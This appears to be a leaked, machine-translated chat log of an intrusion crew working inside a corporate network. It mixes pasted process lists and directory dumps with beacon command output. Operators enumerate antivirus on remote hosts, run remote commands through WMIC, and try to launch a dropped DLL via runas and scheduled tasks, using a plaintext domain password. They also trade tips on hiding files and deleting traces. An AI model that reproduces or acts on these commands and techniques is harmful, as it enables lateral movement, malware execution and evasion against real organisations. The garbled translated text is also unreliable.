Services 0 6,660 K NT AUTHORITY\SYSTEM 0:00:00 SavService.exe 4704 Services 0 389,444 K NT AUTHORITY\LOCAL SERVICE 1:16:05 SAVAdminService.exe 1252 Services 0 3,340 K NT AUTHORITY\SYSTEM 0:00:04 swi_service.exe 2104 Services 0 19,752 K NT AUTHORITY\SYSTEM 0:00:01 swi_filter.exe 5112 Services 0 4,400 K NT AUTHORITY\SYSTEM 0:00:00 swi_fc.exe 3056 Services 0 19,596 K NT AUTHORITY\SYSTEM 0:00:01 ALsvc.exe 788 Services 0 2,352 K NT AUTHORITY\SYSTEM ``So what processes are they? >description: EPIC Dashboard Server (PC) OU=EPIC SERVICE Dashboard Server: EpicAPM.loomisco.com Central Server: TLCEPICCS01.loomisco.com MoveIt Server: TLCAutoTF2.loomisco.com TLCANALYTICS1.loomisco.com TLCAutoTFR.loomisco.com TLCSKLM1.loomisco.com ``write in isis''. inetinfo.exe" is a component of Microsoft Internet Information Services (IIS), the popular web server package widely deployed on the Internet ``inetinfo.exe HandleCount Name Priority ProcessId ThreadCount WorkingSetSize 0 System Idle Process 0 0 4 4096 928 System 8 4 119 143360 51 smss.exe 11 332 2 1245184 423 csrss.exe 13 444 12 4632576 114 csrss.exe 13 536 10 4132864 95 wininit.exe 13 560 1 5029888 157 winlogon.exe 13 604 2 8785920 340 services.exe 9 684 4 10944512 1015 lsass.exe 9 708 8 21753856 503 svchost.exe 8 804 13 15306752 555 svchost.exe 8 868 8 9678848 405 LogonUI.exe 13 952 10 47247360 311 dwm.exe 13 960 9 37392384 450 svchost.exe 8 1008 23 12296192 521 svchost.exe 8 380 20 21225472 426 svchost.exe 8 540 13 17879040 543 svchost.exe 8 664 23 19382272 654 svchost.exe 8 912 20 24899584 422 svchost.exe 8 1168 18 17412096 277 SEDService.exe 8 1184 18 17870848 144 svchost.exe 8 1284 4 6750208 1728 svchost.exe 8 1292 37 61165568 289 WUDFHost.exe 8 1380 6 8069120 659 SavService.exe 8 1956 74 287371264 160 svchost.exe 8 2244 6 7168000 424 spoolsv.exe 8 2448 11 16535552 150 MDM.EXE 8 2640 3 8101888 161 inetinfo.exe 8 2648 5 17334272 337 mqsvc.exe 8 2668 31 13676544 205 svchost.exe 8 2692 6 8470528 373 svchost.exe 8 2700 11 22773760 
270 SMSvcHost.exe 8 2712 7 22892544 181 SAVAdminService.exe 8 2720 6 4710400 122 svchost.exe 8 2772 2 10158080 177 swc_service.exe 8 2792 6 8200192 352 ManagementAgentNT.exe 8 2804 21 8261632 523 SSPService.exe 8 2868 83 26312704 184 ALsvc.exe 8 2876 8 3194880 185 tvnserver.exe 8 2900 12 7376896 138 swi_filter.exe 8 2920 3 6029312 507 MsMpEng.exe 8 2960 25 179359744 139 svchost.exe 8 3004 8 10702848 218 svchost.exe 8 3012 16 12181504 119 armsvc.exe 8 3040 2 6270976 264 swi_service.exe 8 3048 16 22609920 184 swi_fc.exe 8 3200 6 16805888 202 SMSvcHost.exe 8 3720 5 14598144 194 msdtc.exe 8 4016 9 9834496 347 RouterNT.exe 8 4980 20 8503296 617 SearchIndexer.exe 8 1304 11 16453632 313 WmiPrvSE.exe 8 5016 11 31014912 279 WmiPrvSE.exe 8 4536 11 20398080 180 WmiPrvSE.exe 8 5484 8 10162176 195 WmiPrvSE.exe 8 5764 6 9646080 ``will be our local meme)Forgot, now fix itfirst you only need to make a token to run the tripod only remove the hell infopreparation which you did on the serverskai? waiting for the report then and in such cases under the group name in () write a description, what kind of software do group `HCL Sametime` and there this server ``. HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration ``https://www.processchecker.com/developers_info/25/IBM%20Corpче what's that gadget, can't Google it. 
StLaunch.exe 5324 Services 0 4,820 K NT AUTHORITY\SYSTEM 0:00:00 stmsservice.exe 5348 Services 0 18,428 K NT AUTHORITY\SYSTEM 0:00:00 nSTMeetingServer.exe 5376 Services 0 20,548 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 5392 Services 0 3,580 K NT AUTHORITY\SYSTEM 0:00:00 steventserver.exe 5416 Services 0 38,924 K NT AUTHORITY\SYSTEM 0:02:35 stservicemanager.exe 5564 Services 0 33,128 K NT AUTHORITY\SYSTEM 0:01:30 RouterNT.exe 6000 Services 0 8,144 K NT AUTHORITY\SYSTEM 0:00:00 StCommLaunch.exe 3688 Services 0 5,940 K NT AUTHORITY\SYSTEM 0:00:00 STCommunity.exe 6072 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:47 STConfigurationApp.exe 524 Services 0 84,984 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 5020 Services 0 3,628 K NT AUTHORITY\SYSTEM 0:00:00 StLogger.exe 940 Services 0 220,100 K NT AUTHORITY\SYSTEM 0:00:03 STPlaces.exe 5532 Services 0 7,764 K NT AUTHORITY\SYSTEM 0:00:00 STOnlineDir.exe 5576 Services 0 7,948 K NT AUTHORITY\SYSTEM 0:00:00 stpresencecompatmgr.exe 3356 Services 0 28,844 K NT AUTHORITY\SYSTEM 0:00:02 stpresencemgr.exe 2836 Services 0 35,068 K NT AUTHORITY\SYSTEM 0:01:44 stpresencesubmgr.exe 2272 Services 0 79,188 K NT AUTHORITY\SYSTEM 0:01:33 stuserinfo.exe 3424 Services 0 77,720 K NT AUTHORITY\SYSTEM 0:00:04 STConference.exe 4708 Services 0 7,548 K NT AUTHORITY\SYSTEM 0:00:00 STDirectory.exe 5680 Services 0 50,696 K NT AUTHORITY\SYSTEM 0:00:01 conhost.exe 5996 Services 0 3,620 K NT AUTHORITY\SYSTEM 0:00:00 StChatLogging.exe 5824 Services 0 7,616 K NT AUTHORITY\SYSTEM 0:00:00 StResolve.exe 5728 Services 0 62,780 K NT AUTHORITY\SYSTEM 0:00:15 conhost.exe 5684 Services 0 3,628 K NT AUTHORITY\SYSTEM 0:00:00 StUserStorage.exe 6184 Services 0 471,648 K NT AUTHORITY\SYSTEM 0:00:11 StPrivacy.exe 6248 Services 0 88,028 K NT AUTHORITY\SYSTEM 0:00:00 STMux.exe 6312 Services 0 26,828 K NT AUTHORITY\SYSTEM 0:00:59 StAdminSrv.exe 6360 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00 STSecurity.exe 6400 Services 0 7,436 K NT AUTHORITY\SYSTEM 0:00:00 stpolicy.exe 
6440 Services 0 45,056 K NT AUTHORITY\SYSTEM 0:00:04 STFileTransfer.exe 6532 Services 0 7,604 K NT AUTHORITY\SYSTEM 0:00:02 STPolling.exe 6584 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00 StUsers.exe 6660 Services 0 57,984 K khm khm (@user9) I thought someone was going to say take the hell off of the system, I'm just kidding, is everybody that incomprehensible? then why do we all go home if there is no clues, just make a VMs group System Manufacturer: VMware, Inc. System Model: VMware7,1 ``and take off sisteminfo``. Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 24 K NT AUTHORITY\SYSTEM 109:24:47 System 4 Services 0 304 K N/A 0:02:32 smss.exe 332 Services 0 1,284 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 420 Services 0 4,996 K NT AUTHORITY\SYSTEM 0:00:55 wininit.exe 472 Services 0 5,268 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 480 Console 1 10,532 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 516 Console 1 4,864 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 572 Services 0 13,168 K NT AUTHORITY\SYSTEM 0:00:10 lsass.exe 588 Services 0 17,344 K NT AUTHORITY\SYSTEM 0:02:05 lsm.exe 596 Services 0 7,252 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 696 Services 0 11,408 K NT AUTHORITY\SYSTEM 0:00:11 SEDService.exe 752 Services 0 13,820 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 844 Services 0 10,016 K NT AUTHORITY\NETWORK SERVICE 0:00:05 LogonUI.exe 916 Console 1 19,572 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 932 Services 0 16,168 K NT AUTHORITY\LOCAL SERVICE 0:00:15 svchost.exe 1016 Services 0 45,260 K NT AUTHORITY\SYSTEM 0:02:12 svchost.exe 428 Services 0 13,484 K NT AUTHORITY\LOCAL SERVICE 0:00:02 svchost.exe 468 Services 0 16,956 K NT AUTHORITY\SYSTEM 0:00:16 SavService.exe 688 Services 0 292,136 K NT AUTHORITY\LOCAL SERVICE 0:13:21 svchost.exe 1304 Services 0 19,736 K NT 
AUTHORITY\NETWORK SERVICE 0:00:08 svchost.exe 1416 Services 0 11,980 K NT AUTHORITY\LOCAL SERVICE 0:00:00 spoolsv.exe 1560 Services 0 16,348 K NT AUTHORITY\SYSTEM 0:00:03 svchost.exe 1632 Services 0 11,624 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 1808 Services 0 2,996 K NT AUTHORITY\LOCAL SERVICE 0:00:00 SAVAdminService.exe 1848 Services 0 3,084 K NT AUTHORITY\SYSTEM 0:00:00 nra.exe 1908 Services 0 12,480 K NT AUTHORITY\SYSTEM 0:00:00 nrcuser.exe 1328 Services 0 114,912 K NT AUTHORITY\SYSTEM 0:00:00 ManagementAgentNT.exe 1504 Services 0 6,924 K NT AUTHORITY\SYSTEM 0:00:39 ALsvc.exe 2228 Services 0 2,168 K NT AUTHORITY\SYSTEM 0:00:08 SSPService.exe 2364 Services 0 21,696 K NT AUTHORITY\SYSTEM 0:00:01 swc_service.exe 2420 Services 0 6,280 K NT AUTHORITY\SYSTEM 0:00:00 swi_service.exe 2536 Services 0 24,112 K NT AUTHORITY\SYSTEM 0:00:00 tvnserver.exe 2596 Services 0 7,004 K NT AUTHORITY\SYSTEM 0:00:00 VGAuthService.exe 2692 Services 0 11,156 K NT AUTHORITY\SYSTEM 0:00:00 vmtoolsd.exe 2760 Services 0 22,260 K NT AUTHORITY\SYSTEM 0:02:31 ManagementAgentHost.exe 2812 Services 0 10,320 K NT AUTHORITY\SYSTEM 0:00:00 WinCollectSvc.exe 2176 Services 0 11,540 K NT AUTHORITY\SYSTEM 0:01:49 WinCollect.exe 3096 Services 0 20,928 K NT AUTHORITY\SYSTEM 0:44:21 conhost.exe 3108 Services 0 3,524 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 3212 Services 0 20,300 K NT AUTHORITY\NETWORK SERVICE 0:01:49 svchost.exe 3696 Services 0 10,296 K NT AUTHORITY\NETWORK SERVICE 0:00:01 svchost.exe 3756 Services 0 6,744 K NT AUTHORITY\NETWORK SERVICE 0:00:00 dllhost.exe 3892 Services 0 12,556 K NT AUTHORITY\SYSTEM 0:00:00 msdtc.exe 4044 Services 0 8,564 K NT AUTHORITY\NETWORK SERVICE 0:00:00 RouterNT.exe 5040 Services 0 8,072 K NT AUTHORITY\SYSTEM 0:00:00 ANServer.exe 2188 Services 0 13,412 K LOOMIS\gentranadm 0:00:20 Mercury.exe 1320 Services 0 11,960 K LOOMIS\gentranadm 0:00:01 WmiPrvSE.exe 2260 Services 0 21,468 K NT AUTHORITY\SYSTEM 0:00:03 RpcSrv.exe 4868 Services 0 12,004 K LOOMIS\gentranadm 
0:00:03 TrustedInstaller.exe 4840 Services 0 737,992 K NT AUTHORITY\SYSTEM 0:01:57 ``a list of processes in the studiovirtualka what else? if TightVNC process hangs in the RDS can you throw the server? I would generally recommend that you start learning ps or batsyrazvedeniya with batnik, stupid in syntax) still useful this script of course ping that did not have to then end of the day did all wellmodtsida no I thought that you did supernatural)aaa[ ](https://mediaeveryonecom/group/archive-loomisco-com?msg=FmF4byGeqBMLNNFaB) so I just got into the process))) aah, that's not it.@user9 throw pliz example commands, write yourself in the notes on spawning sessions from another context through jump with crudes yeah? beacon from Shutdown@192.168.0.249 (SCANSTORAGE) ``Then clean up, delete files, tsk, processes and in slipda and that's it for today the list of servers to finish everything, great after all docudocumentation please share with colleagues and add if something is missing who documented the current information for today? IMAGING2-NEW.loomisco.com Block GPO: Metafile-vm1.loomisco.com these? + a fully sorted list of servers and the result is shuffleable I think you understand that the frontend is just the interface for interoperability Sophos.FrontEnd.Service.e 4816 Services 0 99,720 K LOOMIS\lynx 0:00:06 ``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=CrSPtfnFspCxPtC6v) list[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jHTWaeKQKgJGK7qHM) 1 [ManagementAgentNT.exe] TCP 10.10.10.56:54963 192.168.0.109:8194 ``As you understood, remove the netstat and see where it sends the data``. ManagementAgentNT.exe file information The process known as Sophos Agent belongs to Sophos Messaging System or Sophos Remote Management System software ``To remove doubts on a bare-metal server, non-standard processes will be ABs``. 
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41 swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00 SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33 SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00 swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01 ``So it's simple - we saw in the processes AB (sofos) in networks it is centralized in its adminstrate search AB in the network)`` While the scan goes160 of 543 works shufflefinder, enough sofos everywherepft,fkcz ping them there live 1/10`` beacon> shell WMIC /Node:192.168.4.28 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [*] Tasked beacon to run: WMIC /Node:192.168.4.28 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [+] host called home, sent: 139 bytes [+] received output: displayName=Sophos Anti-Virus ``Chrome is open under Give a list of processes from here: `192.168.0.109` what exactly? beacon> shell WMIC /Node:192.168.1.235 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [*] Tasked beacon to run: WMIC /Node:192.168.1.235 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [+] host called home, sent: 140 bytes [+] received output: displayName=Sophos Anti-Virus ``@user8 do not delete files means? The taskeng.exe process is part of the Task Scheduler Engine of Microsoft Isn't the box that pops up at startup of the Delloks called taskeng.exe? 
)))) great, make a shuffinder and the process from YES[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pMwiwkBPrSzjwLxZ7) will hang there) then the following method: make a batch with timeout 9999999 and run us stasx apparently when you run it, dlk is not working and cmd is running under YES[ ](https://mediaeveryonecom/group/archive-loomisco-com?msg=T8ffZsEkytLgk4NjD) by inertia did the process hang[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=dzCgGB82tkcZDXArb) why is it here? PS look sheet[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=izJa5MLu3dXbY2Sjd) `` shell wmic /node:10.10.10.56 process call create "cmd /c netstat.exe -abno > C:\Windows\Temp\output.txt" ``` Take ```. beacon> runas /user:loomisco.com\Shutdown p3bk@c1 "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" [*] Tasked beacon to execute: "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown [+] host called home, sent: 125 bytes [-] could not run "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown: 5 ``` what did i do wrong ? beacon> shell WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [*] Tasked beacon to run: WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [+] host called home, sent: 139 bytes [+] received output: ERROR: Description = The RPC server is unavailable. 
``and all then@user8 in notes syntax[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=yYkABwJhkA8ELWjGJ) second[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=FX8LTXvLS4Yv2jQf7) which bicon[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pkcJTCAtBsPiBCb5P) there may be another AB on top)yes it worked out and file not giveghere netstat yet?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=MKeNbEDTM3fFiTCMF) which is obvious and 2 more pk for accuracy `` beacon> shell WMIC /Node:192.168.0.107 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [*] Tasked beacon to run: WMIC /Node:192.168.0.107 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [+] host called home, sent: 140 bytes [+] received output: displayName=Sophos Anti-Virus Waiting)) everything will be here [ ] (https://mediaeveryone.com/group/archive-loomisco-com?msg=4yRLZ27gz2fcHZEjG) 1Da sure I asked for user PCs for a reason [ ] (https://mediaeveryone.com/group/archive-loomisco-com?msg=DXTtNivyhKiYG3R2G) The above link does not work on server OSes, because such namespace does not exist as such `C:\Windows\temp\vmware-temp\AgentNT.dll` - again, did not pay attention, that's the same metafile` `` I am confused. Node:10.10.10.56 ``` what os? now i will try by the way ranas did not work? with the creed can try through vmik if you just start the dll then the session appears and without stask? 
as i have not tried, through the stask can not start the dll `` beacon> shell WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [*] Tasked beacon to run: WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List [+] host called home, sent: 138 bytes [+] received output: ERROR: Description = Invalid namespace ``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=s2h9mkJEncYNNDKjM) just change the node[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=Td6keCTc5tChNk3tn) and in which beacon? Yes, some ancient manuscript ``WMIC /Node:localhost /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List `` I think something in Latin[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=ReWK9JmyeG4GA7KZL) give you a nickname if you understand it here take another list of AVs on user PCs, 2-3 pcs, kznm `` beacon> shell wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt" [*] Tasked beacon to run: wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt" [+] host called home, sent: 136 bytes [+] received output: Invalid Global Switch. beacon> shell wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt" [*] Tasked beacon to run: wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt" [+] host called home, sent: 122 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. 
Out Parameters: instance of __PARAMETERS { ProcessId = 8144; ReturnValue = 0; }; ``and C:\windows\temp alwaysC:\temp is not alwaysC:\tempC:\, C:\users are quite visible places it is clear, I for example do not recommend to put files in such places, since the systems rights anyway - C:\windows\tempwmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\output.txt"@user8 then let's see the list of installed software Metafile-vm1.loomisco.com ``Maybe it's this @user7 add /RP just in case /RP is not a filewasher at all``` beacon> shell rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint [*] Tasked beacon to run: rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint ``` Does it work that way? Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 24 K NT AUTHORITY\SYSTEM 1767:21:11 System 4 Services 0 6,104 K N/A 0:02:10 smss.exe 424 Services 0 740 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 492 Services 0 5,728 K NT AUTHORITY\SYSTEM 0:00:21 csrss.exe 536 Console 1 10,136 K NT AUTHORITY\SYSTEM 0:00:00 wininit.exe 544 Services 0 4,264 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 592 Console 1 5,228 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 624 Services 0 8,488 K NT AUTHORITY\SYSTEM 0:00:09 lsass.exe 636 Services 0 17,392 K NT AUTHORITY\SYSTEM 0:06:14 lsm.exe 644 Services 0 5,700 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 804 Services 0 7,880 K NT AUTHORITY\SYSTEM 0:02:06 svchost.exe 864 Services 0 7,976 K NT AUTHORITY\NETWORK SERVICE 0:00:59 svchost.exe 960 Services 0 12,636 K NT AUTHORITY\LOCAL SERVICE 0:02:09 svchost.exe 1032 Services 0 9,528 K NT AUTHORITY\SYSTEM 0:00:02 svchost.exe 1044 Services 0 60,424 K NT AUTHORITY\SYSTEM 0:27:09 SLsvc.exe 1056 Services 0 9,808 K NT AUTHORITY\NETWORK SERVICE 0:00:00 svchost.exe 1124 Services 0 11,412 K NT 
AUTHORITY\LOCAL SERVICE 0:00:12 svchost.exe 1184 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:11 svchost.exe 1484 Services 0 17,628 K NT AUTHORITY\NETWORK SERVICE 0:00:03 svchost.exe 1608 Services 0 9,828 K NT AUTHORITY\LOCAL SERVICE 0:00:00 spoolsv.exe 1816 Services 0 9,508 K NT AUTHORITY\SYSTEM 0:00:01 armsvc.exe 1844 Services 0 3,660 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 1860 Services 0 9,528 K NT AUTHORITY\SYSTEM 0:00:00 inetinfo.exe 1944 Services 0 13,524 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2024 Services 0 5,796 K NT AUTHORITY\NETWORK SERVICE 0:00:00 svchost.exe 224 Services 0 3,092 K NT AUTHORITY\LOCAL SERVICE 0:00:00 tvnserver.exe 2088 Services 0 8,256 K NT AUTHORITY\SYSTEM 0:00:01 VGAuthService.exe 2152 Services 0 10,356 K NT AUTHORITY\SYSTEM 0:00:00 vmtoolsd.exe 2168 Services 0 43,536 K NT AUTHORITY\SYSTEM 0:33:04 svchost.exe 2184 Services 0 8,788 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2196 Services 0 2,236 K NT AUTHORITY\SYSTEM 0:00:00 WinCollectSvc.exe 2280 Services 0 9,876 K NT AUTHORITY\SYSTEM 0:48:11 taskeng.exe 2420 Services 0 8,132 K NT AUTHORITY\SYSTEM 0:00:01 WinCollect.exe 2540 Services 0 20,824 K NT AUTHORITY\SYSTEM 16:06:55 WmiPrvSE.exe 2876 Services 0 18,764 K NT AUTHORITY\NETWORK SERVICE 0:34:28 dllhost.exe 2960 Services 0 12,896 K NT AUTHORITY\SYSTEM 0:00:00 msdtc.exe 3208 Services 0 7,416 K NT AUTHORITY\NETWORK SERVICE 0:00:00 svchost.exe 3520 Services 0 5,200 K NT AUTHORITY\NETWORK SERVICE 0:00:00 WmiPrvSE.exe 3624 Services 0 30,580 K NT AUTHORITY\SYSTEM 0:00:08 taskeng.exe 4008 Console 1 7,976 K LOOMIS\Administrator 0:00:00 dwm.exe 528 Console 1 4,492 K LOOMIS\Administrator 0:00:00 explorer.exe 1644 Console 1 26,724 K LOOMIS\Administrator 0:00:07 vmtoolsd.exe 3312 Console 1 9,608 K LOOMIS\Administrator 0:58:09 tvnserver.exe 3228 Console 1 3,924 K LOOMIS\Administrator 0:00:00 RouterNT.exe 784 Services 0 7,724 K NT AUTHORITY\SYSTEM 0:00:02 TrustedInstaller.exe 5556 Services 0 18,668 K NT AUTHORITY\SYSTEM 0:00:38 
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41 swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00 SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33 SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00 swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01 ALsvc.exe 8796 Services 0 1,612 K NT AUTHORITY\SYSTEM 0:00:42 ALMon.exe 8220 Console 1 1,084 K LOOMIS\Administrator 0:00:17 mmc.exe 5264 Console 1 59,100 K LOOMIS\Administrator 0:00:01 LogonUI.exe 4536 Console 1 11,712 K NT AUTHORITY\SYSTEM 0:00:00 logon.scr 8492 Console 1 2,012 K LOOMIS\Administrator 0:00:00 ``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=C3TcGDDgMrj49fiyP) on Metafile-vm1.loomisco.com mostly Sophos (av) processes which beacon?.and if you run it manually will it work ([ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jQku7Y4vPJaTCwZj2) what is installed may not be active, as a relic of some time with or without cmd, have tried[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=dTcLHjLTMgPAzLKoi) maybe better to look at the installed software and not the processes? try to remove it, so it was removed and the exe is still there?) try to add cmd /c rundll32 ...try adding to the beginning of cmd /c4 people can not find a possible error in the command? 4who works next to @user7 ?yes token@user9 under what conditions would this syntax be? shell tasklist /s /vdatasklist through shell go? 
and also, get in the habit of immediately deleting the stack behind you
it will show the user from which to spin with the flag /v
better to check through tasklist?
i can not see that the 4th point is done)
:^)
please forward the message where i wrote how to determine)
either the error in the /tr itself, or yes, i have prohibited to run the dll
```
dNSHostName: Metafile-vm1.loomisco.com
dn: CN=METAFILE-VM1,OU=Block GPOs,OU=Unblocked,OU=Domain Servers,DC=loomisco,DC=com
servicePrincipalName: TERMSRV/METAFILE-VM1
servicePrincipalName: TERMSRV/Metafile-vm1.loomisco.com
servicePrincipalName: HOST/METAFILE-VM1
servicePrincipalName: HOST/Metafile-vm1.loomisco.com
```
no description, you can't tell from the name, spn 4 things, well where is it not running?
```
beacon> shell schtasks /create /ru loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[*] Tasked beacon to run: schtasks /create /en loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[+] host called home, sent: 199 bytes
[+] received output:
SUCCESS: The scheduled task "ManagementAgentNTT" has successfully been created.

beacon> shell schtasks /run /tn ManagementAgentNTT
[*] Tasked beacon to run: schtasks /run /tn ManagementAgentNTT
[+] host called home, sent: 67 bytes
[+] received output:
SUCCESS: Attempted to run the scheduled task "ManagementAgentNTT".
```
I wrote above) and how do I understand this pile of spn without a description
type OU=Epic Server, but there are some local tricks they have
I understand the essence of looking at the names and do not understand what is there)
the essence of sorting is to make it clear what the server has, or what it is for?
Data Transfer: IMAGING2-NEW.loomisco.com
What do we have here?
Block GPO: Metafile-vm1.loomisco.com
okay
1 minute
sharefinder can't run?
ok, what do we have in the end?
then we still need to finish sorting
there I just do not know where to put, they have in hell so says
other
help @user7 then, because he again randomly pokes commands
I noticed) on the command try)
okay, @user9 a little joke, more scolding
do not want to delete the old task, name the same name)
`WARNING: The task name "ManagementAgentNTT" already exists. Do you want to replace it (Y/N)?`
how do i get around it?
how do i do that?
i wanted to write shell, but i got make_token, misclick
```
user 2-2 beacon> make_token
[-] make_token error: not enough arguments
[+] host called home, sent: 12 bytes
```
just schtasks /ru "domain\user" /tn ....
and since the context is system you do not need to know his password, and the user from which it starts: run as user parameter `RU`
@user9 made me laugh
now let's take this move and put it on tasks
okay, I like your way of thinking)))))))
:weary:
just in any unclear situation shoot ad
@user9 to tears straight))))
By local startup?
well, no)
ah well shuffle_
wasn't this task at all unexpectedly written))
but it was funny, why shoot @user9?
is already interesting to inject into the process, yes token to run tasks
as an option, but in the context of user7 conditions?
you can not token, full-fledged process with creds, yes token
Run remote
1) anyone know how to solve the problem user7?
I'll ask one question and please honestly
why? you saw it before, conditions are identical, how do you breathe under water?
yes I think it is already clear since it does not give) so without /s it will not create
set parameters to create local task
what?
1) 2) @user7 already said that he tried 3 users and the error is the same
are you trying to create a task on a remote pc?
but if yes it does not work please give me a hint how? if it is possible to spam with the correct creds need
colleagues, everyone has such a verdict?
did not fully understand the question, got it, then it turns out that not spam
YES on this machine? so why are you writing them? credentials are not allowed on the local pc
so? - the translation of the error at least he is watched by his team)
i already wrote @user3 in lsd
now rushed to tasks - they form lists of servers, yes
user7 what the hell are you doing, start studying the output of commands
You have 3 more pcs
Is ANY user on the local machine + you write the LOCAL user? someone fucking reads the errors?
I'll read it again
@user8 wait not much
IM Server, Central Server, Database server for multiple DBs, with them it's clear
RDS/IIS/SQL
under 3 users writes that it is not allowed on this machine
I see descriptions a bunch and almost all identical look
understand what it needs
silence?
strange group
do you put them in a separate group?
```
beacon> shell schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc
[*] Tasked beacon to run: schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc minute
[+] host called home, sent: 198 bytes
[+] received output:
ERROR: User credentials are not allowed on the local machine.
```
what to do?
try another user?
outside the domain
`192.168.0.224:445 (platform: 500 version: 5.0 name: OCR1 domain: WORKGROUP)`
1 above file portscan.txt
How do you scan the subnets?
I think one by description?
OK there is user RDS and RDS list by name, by group, by description, by process
```
dNSHostName: TLCRDSLIC1.loomisco.com
servicePrincipalName: WSMAN/TLCRDSLIC1
servicePrincipalName: WSMAN/TLCRDSLIC1.loomisco.com
servicePrincipalName: TERMSRV/TLCRDSLIC1
servicePrincipalName: TERMSRV/TLCRDSLIC1.loomisco.com
